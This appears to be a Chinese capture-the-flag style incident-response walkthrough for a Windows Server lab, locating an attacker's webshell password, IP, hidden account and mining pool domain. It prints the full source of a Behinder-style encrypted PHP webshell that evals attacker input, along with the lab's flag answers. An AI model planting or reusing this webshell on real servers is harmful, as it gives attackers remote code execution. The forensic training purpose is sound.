知工善防-Windows Server-2022- Web渗透1

服务器被攻击后关键信息排查(通关条件指南)

背景:小李在服务器值守时发现CPU占用飙升,因紧张直接关机。需从其服务器系统中排查出以下4项关键信息,作为通关条件。
https://cloud.kong.college/s/QnS6

需要的工具

1. 攻击者的shell密码

排查步骤

  1. 定位异常日志:查看服务器日志文件 access.log,发现大量来自路径 /content/plugins/tips/shell.php 的POST请求,判断该文件为攻击者遗留的后门脚本。

  2. 分析后门脚本代码:该PHP脚本核心逻辑如下,其中明确标注了密钥与默认连接密码的关联:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    <?php
    @error_reporting(0);
    session_start();
        $key="e45e329feb5d925b"; // 该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    	$_SESSION['k']=$key;
    	session_write_close();
    	$post=file_get_contents("php://input");
    	if(!extension_loaded('openssl'))
    	{
    		$t="base64_"."decode";
    		$post=$t($post."");
    		
    		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
    	}
    	else
    	{
    		$post=openssl_decrypt($post, "AES128", $key);
    	}
        $arr=explode('|',$post);
        $func=$arr[0];
        $params=$arr[1];
    	class C{public function __invoke($p) {eval($p."");}}
        @call_user_func(new C(),$params);
    ?>

    脚本注释明确“默认连接密码为rebeyond”,即攻击者的shell密码。

答案

rebeyond

2. 攻击者的IP地址

排查步骤

  1. 关联日志来源:基于上一步发现的后门脚本 /content/plugins/tips/shell.php,回溯 access.log 中该文件的访问记录。
  2. 定位高频IP:日志中频繁向该后门脚本发起连接的IP地址,即为攻击者的IP。

答案

192.168.126.1

3. 攻击者的隐藏账户名称

排查步骤

  1. 检查用户目录:访问服务器的“用户文件夹”,通过文件管理器查看所有用户账户(含隐藏账户)。
  2. 识别异常账户:从目录列表中发现非默认的隐藏账户,截图证据如下:
    用户文件夹隐藏账户截图

答案

hack168

4. 攻击者挖矿程序的矿池域名

排查步骤

  1. 获取挖矿程序:从服务器中找到攻击者遗留的挖矿程序 Kuang.exe
  2. 解包EXE文件:使用工具 pyinstxtractor 将EXE文件解包为可反编译的PYC文件,执行命令:
    1
    python pyinstxtractor-master/pyinstxtractor.py Kuang.exe
    解包后需提取下图中划线标注的文件:
    PYC文件提取截图
  3. 反编译分析:将提取的PYC文件上传至 tools.bugscaner.com 进行反编译,从反编译结果中定位矿池域名,分析结果截图如下:
    反编译结果截图

答案

wakuang.zhigongshanfang.top